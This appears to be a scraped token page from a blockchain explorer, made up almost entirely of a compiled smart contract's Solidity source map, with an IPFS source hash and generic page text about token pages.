;;;;:16;;;;;;;;;;;;;;;;;;9415:31;9477:2;9462:26;;9471:4;9462:26;;;9481:6;9462:26;;;;;;:::i;:::-;;;;;;;;9499:37;9519:4;9525:2;9529:6;9499:19;:37::i;:::-;8710:833;8602:941;;;:::o;3059:187:0:-;3132:16;3151:6;;;;;;;;;;;3132:25;;3176:8;3167:6;;:17;;;;;;;;;;;;;;;;;;3230:8;3199:40;;3220:8;3199:40;;;;;;;;;;;;3122:124;3059:187;:::o;14473:121:1:-;;;;:::o;13767:120::-;;;;:::o;7:99:4:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:117;1785:1;1782;1775:12;1799:117;1908:1;1905;1898:12;1922:117;2031:1;2028;2021:12;2062:568;2135:8;2145:6;2195:3;2188:4;2180:6;2176:17;2172:27;2162:122;;2203:79;;:::i;:::-;2162:122;2316:6;2303:20;2293:30;;2346:18;2338:6;2335:30;2332:117;;;2368:79;;:::i;:::-;2332:117;2482:4;2474:6;2470:17;2458:29;;2536:3;2528:4;2520:6;2516:17;2506:8;2502:32;2499:41;2496:128;;;2543:79;;:::i;:::-;2496:128;2062:568;;;;;:::o;2636:559::-;2722:6;2730;2779:2;2767:9;2758:7;2754:23;2750:32;2747:119;;;2785:79;;:::i;:::-;2747:119;2933:1;2922:9;2918:17;2905:31;2963:18;2955:6;2952:30;2949:117;;;2985:79;;:::i;:::-;2949:117;3098:80;3170:7;3161:6;3150:9;3146:22;3098:80;:::i;:::-;3080:98;;;;2876:312;2636:559;;;;;:::o;3201:126::-;3238:7;3278:42;3271:5;3267:54;3256:65;;3201:126;;;:::o;3333:96::-;3370:7;3399:24;3417:5;3399:24;:::i;:::-;3388:35;;3333:96;;;:::o;3435:122::-;3508:24;3526:5;3508:24;:::i;:::-;3501:5;3498:35;3488:63;;3547:1;3544;3537:12;3488:63;3435:122;:::o;3563:139::-;3609:5;3647:6;3634:20;3625:29;;3663:33;3690:5;3663:33;:::i;:::-;3563:139;;;;:::o;3708:77::-;3745:7;3774:5;3763:16;;3708:77;;;:::o;3791:122::-;3864:24;3882:5;3864:24;:::i;:::-;3857:5;3854:35;3844:63;;3903:1;3900;3893:12;3844:63;3791:122;:::o;3919:139::-;3965:5;4003:6;3990:20;3981:29;;4019:33;4046:5;4019:33;:::i;:::-;3919:139;;;;:::o;4064:474::-;4132:6;4140;4189:2;4177:9;4168:7;4164:23;4160:32;4157:119;;;4195:79;;:::i;:::-;4157:119;4315:1;4340:53;4385:7;4376:6;4365:9;4361:22;4340:53;:::i;:::-;4330:63;;4286:117;4442:2;4468:53;4513:7;4504:6;4493:9;4489:22;4468:53;:::i;:::-;4458:63;;4413:118;4064:474;;;;;:::o;4544:90::-;4578:7;4621:5;4614:13;4607:21;4596:32;;4544:90;;;:::o;4640:109::-;4721:21;4736:5;4721:21;:::i;:::-;4716:3;4709:34;4640:109;;:::o;4755:210::-;4842:4;4880:2;4869:9;4865:18;4857:26;;4893:65;4955:1;4944:9;4940:17;4931:6;4893:65;:::i;:::-;4755:210;;;;:::o;4971:118::-;5058:24;5076:5;5058:24;:::i;:::-;5053:3;5046:37;4971:118;;:::o;5095:222::-;5188:4;5226:2;5215:9;5211:18;5203:26;;5239:71;5307:1;5296:9;5292:17;5283:6;5239:71;:::i;:::-;5095:222;;;;:::o;5323:619::-;5400:6;5408;5416;5465:2;5453:9;5444:7;5440:23;5436:32;5433:119;;;5471:79;;:::i;:::-;5433:119;5591:1;5616:53;5661:7;5652:6;5641:9;5637:22;5616:53;:::i;:::-;5606:63;;5562:117;5718:2;5744:53;5789:7;5780:6;5769:9;5765:22;5744:53;:::i;:::-;5734:63;;5689:118;5846:2;5872:53;5917:7;5908:6;5897:9;5893:22;5872:53;:::i;:::-;5862:63;;5817:118;5323:619;;;;;:::o;5948:86::-;5983:7;6023:4;6016:5;6012:16;6001:27;;5948:86;;;:::o;6040:112::-;6123:22;6139:5;6123:22;:::i;:::-;6118:3;6111:35;6040:112;;:::o;6158:214::-;6247:4;6285:2;6274:9;6270:18;6262:26;;6298:67;6362:1;6351:9;6347:17;6338:6;6298:67;:::i;:::-;6158:214;;;;:::o;6378:329::-;6437:6;6486:2;6474:9;6465:7;6461:23;6457:32;6454:119;;;6492:79;;:::i;:::-;6454:119;6612:1;6637:53;6682:7;6673:6;6662:9;6658:22;6637:53;:::i;:::-;6627:63;;6583:117;6378:329;;;;:::o;6713:118::-;6800:24;6818:5;6800:24;:::i;:::-;6795:3;6788:37;6713:118;;:::o;6837:222::-;6930:4;6968:2;6957:9;6953:18;6945:26;;6981:71;7049:1;7038:9;7034:17;7025:6;6981:71;:::i;:::-;6837:222;;;;:::o;7065:474::-;7133:6;7141;7190:2;7178:9;7169:7;7165:23;7161:32;7158:119;;;7196:79;;:::i;:::-;7158:119;7316:1;7341:53;7386:7;7377:6;7366:9;7362:22;7341:53;:::i;:::-;7331:63;;7287:117;7443:2;7469:53;7514:7;7505:6;7494:9;7490:22;7469:53;:::i;:::-;7459:63;;7414:118;7065:474;;;;;:::o;7545:180::-;7593:77;7590:1;7583:88;7690:4;7687:1;7680:15;7714:4;7711:1;7704:15;7731:320;7775:6;7812:1;7806:4;7802:12;7792:22;;7859:1;7853:4;7849:12;7880:18;7870:81;;7936:4;7928:6;7924:17;7914:27;;7870:81;7998:2;7990:6;7987:14;7967:18;7964:38;7961:84;;8017:18;;:::i;:::-;7961:84;7782:269;7731:320;;;:::o;8057:180::-;8105:77;8102:1;8095:88;8202:4;8199:1;8192:15;8226:4;8223:1;8216:15;8243:180;8291:77;8288:1;8281:88;8388:4;8385:1;8378:15;8412:4;8409:1;8402:15;8429:233;8468:3;8491:24;8509:5;8491:24;:::i;:::-;8482:33;;8537:66;8530:5;8527:77;8524:103;;8607:18;;:::i;:::-;8524:103;8654:1;8647:5;8643:13;8636:20;;8429:233;;;:::o;8668:191::-;8708:3;8727:20;8745:1;8727:20;:::i;:::-;8722:25;;8761:20;8779:1;8761:20;:::i;:::-;8756:25;;8804:1;8801;8797:9;8790:16;;8825:3;8822:1;8819:10;8816:36;;;8832:18;;:::i;:::-;8816:36;8668:191;;;;:::o;8865:224::-;9005:34;9001:1;8993:6;8989:14;8982:58;9074:7;9069:2;9061:6;9057:15;9050:32;8865:224;:::o;9095:366::-;9237:3;9258:67;9322:2;9317:3;9258:67;:::i;:::-;9251:74;;9334:93;9423:3;9334:93;:::i;:::-;9452:2;9447:3;9443:12;9436:19;;9095:366;;;:::o;9467:419::-;9633:4;9671:2;9660:9;9656:18;9648:26;;9720:9;9714:4;9710:20;9706:1;9695:9;9691:17;9684:47;9748:131;9874:4;9748:131;:::i;:::-;9740:139;;9467:419;;;:::o;9892:225::-;10032:34;10028:1;10020:6;10016:14;10009:58;10101:8;10096:2;10088:6;10084:15;10077:33;9892:225;:::o;10123:366::-;10265:3;10286:67;10350:2;10345:3;10286:67;:::i;:::-;10279:74;;10362:93;10451:3;10362:93;:::i;:::-;10480:2;10475:3;10471:12;10464:19;;10123:366;;;:::o;10495:419::-;10661:4;10699:2;10688:9;10684:18;10676:26;;10748:9;10742:4;10738:20;10734:1;10723:9;10719:17;10712:47;10776:131;10902:4;10776:131;:::i;:::-;10768:139;;10495:419;;;:::o;10920:182::-;11060:34;11056:1;11048:6;11044:14;11037:58;10920:182;:::o;11108:366::-;11250:3;11271:67;11335:2;11330:3;11271:67;:::i;:::-;11264:74;;11347:93;11436:3;11347:93;:::i;:::-;11465:2;11460:3;11456:12;11449:19;;11108:366;;;:::o;11480:419::-;11646:4;11684:2;11673:9;11669:18;11661:26;;11733:9;11727:4;11723:20;11719:1;11708:9;11704:17;11697:47;11761:131;11887:4;11761:131;:::i;:::-;11753:139;;11480:419;;;:::o;11905:223::-;12045:34;12041:1;12033:6;12029:14;12022:58;12114:6;12109:2;12101:6;12097:15;12090:31;11905:223;:::o;12134:366::-;12276:3;12297:67;12361:2;12356:3;12297:67;:::i;:::-;12290:74;;12373:93;12462:3;12373:93;:::i;:::-;12491:2;12486:3;12482:12;12475:19;;12134:366;;;:::o;12506:419::-;12672:4;12710:2;12699:9;12695:18;12687:26;;12759:9;12753:4;12749:20;12745:1;12734:9;12730:17;12723:47;12787:131;12913:4;12787:131;:::i;:::-;12779:139;;12506:419;;;:::o;12931:221::-;13071:34;13067:1;13059:6;13055:14;13048:58;13140:4;13135:2;13127:6;13123:15;13116:29;12931:221;:::o;13158:366::-;13300:3;13321:67;13385:2;13380:3;13321:67;:::i;:::-;13314:74;;13397:93;13486:3;13397:93;:::i;:::-;13515:2;13510:3;13506:12;13499:19;;13158:366;;;:::o;13530:419::-;13696:4;13734:2;13723:9;13719:18;13711:26;;13783:9;13777:4;13773:20;13769:1;13758:9;13754:17;13747:47;13811:131;13937:4;13811:131;:::i;:::-;13803:139;;13530:419;;;:::o;13955:179::-;14095:31;14091:1;14083:6;14079:14;14072:55;13955:179;:::o;14140:366::-;14282:3;14303:67;14367:2;14362:3;14303:67;:::i;:::-;14296:74;;14379:93;14468:3;14379:93;:::i;:::-;14497:2;14492:3;14488:12;14481:19;;14140:366;;;:::o;14512:419::-;14678:4;14716:2;14705:9;14701:18;14693:26;;14765:9;14759:4;14755:20;14751:1;14740:9;14736:17;14729:47;14793:131;14919:4;14793:131;:::i;:::-;14785:139;;14512:419;;;:::o;14937:224::-;15077:34;15073:1;15065:6;15061:14;15054:58;15146:7;15141:2;15133:6;15129:15;15122:32;14937:224;:::o;15167:366::-;15309:3;15330:67;15394:2;15389:3;15330:67;:::i;:::-;15323:74;;15406:93;15495:3;15406:93;:::i;:::-;15524:2;15519:3;15515:12;15508:19;;15167:366;;;:::o;15539:419::-;15705:4;15743:2;15732:9;15728:18;15720:26;;15792:9;15786:4;15782:20;15778:1;15767:9;15763:17;15756:47;15820:131;15946:4;15820:131;:::i;:::-;15812:139;;15539:419;;;:::o;15964:222::-;16104:34;16100:1;16092:6;16088:14;16081:58;16173:5;16168:2;16160:6;16156:15;16149:30;15964:222;:::o;16192:366::-;16334:3;16355:67;16419:2;16414:3;16355:67;:::i;:::-;16348:74;;16431:93;16520:3;16431:93;:::i;:::-;16549:2;16544:3;16540:12;16533:19;;16192:366;;;:::o;16564:419::-;16730:4;16768:2;16757:9;16753:18;16745:26;;16817:9;16811:4;16807:20;16803:1;16792:9;16788:17;16781:47;16845:131;16971:4;16845:131;:::i;:::-;16837:139;;16564:419;;;:::o;16989:225::-;17129:34;17125:1;17117:6;17113:14;17106:58;17198:8;17193:2;17185:6;17181:15;17174:33;16989:225;:::o;17220:366::-;17362:3;17383:67;17447:2;17442:3;17383:67;:::i;:::-;17376:74;;17459:93;17548:3;17459:93;:::i;:::-;17577:2;17572:3;17568:12;17561:19;;17220:366;;;:::o;17592:419::-;17758:4;17796:2;17785:9;17781:18;17773:26;;17845:9;17839:4;17835:20;17831:1;17820:9;17816:17;17809:47;17873:131;17999:4;17873:131;:::i;:::-;17865:139;;17592:419;;;:::o;18017:114::-;;:::o;18137:364::-;18279:3;18300:66;18364:1;18359:3;18300:66;:::i;:::-;18293:73;;18375:93;18464:3;18375:93;:::i;:::-;18493:1;18488:3;18484:11;18477:18;;18137:364;;;:::o;18507:419::-;18673:4;18711:2;18700:9;18696:18;18688:26;;18760:9;18754:4;18750:20;18746:1;18735:9;18731:17;18724:47;18788:131;18914:4;18788:131;:::i;:::-;18780:139;;18507:419;;;:::o
Swarm Source
ipfs://142ce61570da072a51b435874af5c17a630caea8e59191dbe49b8659247411b5
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.